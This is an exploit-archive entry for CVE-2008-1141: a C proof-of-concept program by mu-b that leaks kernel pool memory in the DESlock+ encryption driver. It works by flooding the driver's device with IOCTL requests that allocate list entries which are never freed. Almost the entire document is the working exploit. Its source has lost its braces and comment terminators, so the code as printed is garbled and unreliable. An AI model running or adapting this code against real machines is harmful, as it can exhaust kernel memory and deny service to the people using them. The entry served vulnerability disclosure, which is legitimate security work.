DESlock+ < 3.2.6 - 'LIST' Local Kernel Memory Leak

Related Vulnerabilities: CVE-2008-1141  
Publish Date: 18 Feb 2008
Author: mu-b

                /* deslock-list-leak.c
 * Copyright (c) 2008 by &lt;;
 * DESlock+ &lt;= 3.2.6 local kernel mem leak POC
 * by mu-b - Fri 21 Dec 2007
 * - Tested on: DLMFENC.sys
 * kernel pool memory leak by continually allocating link list
 * structures and never freeing them. This is not without a sense
 * of irony in that each element must correspond to a unique
 * ProcessID (arg[0]). Thus, adding a single element incurs a
 * linear cost due to search :(. (O((n^2+n)/2) overall cost.)
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * -- Digit-Labs 2008!@$!

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;

#include &lt;windows.h&gt;

#define DLMFENC_IOCTL 0x0FA4204C
#define DLMFENC_FLAG  0xC001D00D

#define ARG_SIZE(a)   ((a-(sizeof (int)*2))/sizeof (void *))

struct ioctl_req {
  int flag;
  int req_num;
  void *arg[ARG_SIZE(0x20)];

static void
xor_mask_req (struct ioctl_req *req)
  DWORD i, pid;
  PCHAR ptr;

  pid = GetCurrentProcessId ();
  for (i = 0, ptr = (PCHAR) req; i &lt; 0x0C; i++, ptr++)
    *ptr ^= pid;

main (int argc, char **argv)
  struct ioctl_req req;
  DWORD i, rlen;
  HANDLE hFile;
  BOOL result;

  printf ("DESlock+ &lt;= 3.2.6 local kernel mem leak PoC\n"
          "by: &lt;;\n"
          " -- Digit-Labs 2008!@$!\n\n");

  hFile = CreateFileA ("\\\\.\\DLKPFSD_Device", FILE_EXECUTE,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
                       OPEN_EXISTING, 0, NULL);
      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
      exit (EXIT_FAILURE);

  memset (&amp;req, 0, sizeof req);

  for (i = 0; i &lt;= UINT_MAX; i++)
      req.flag = DLMFENC_FLAG;
      req.req_num = 0x03;
      req.arg[0] = (void *) i;

      xor_mask_req (&amp;req);
      result = DeviceIoControl (hFile, DLMFENC_IOCTL,
                                &amp;req, sizeof req, &amp;req, sizeof req, &amp;rlen, 0);
      if (!result)
          fprintf (stderr, "* DeviceIoControl failed\n");
          exit (EXIT_FAILURE);

      if (!(i % 64))
        printf ("%d..", i);

  CloseHandle (hFile);

  return (EXIT_SUCCESS);

// [2008-02-18]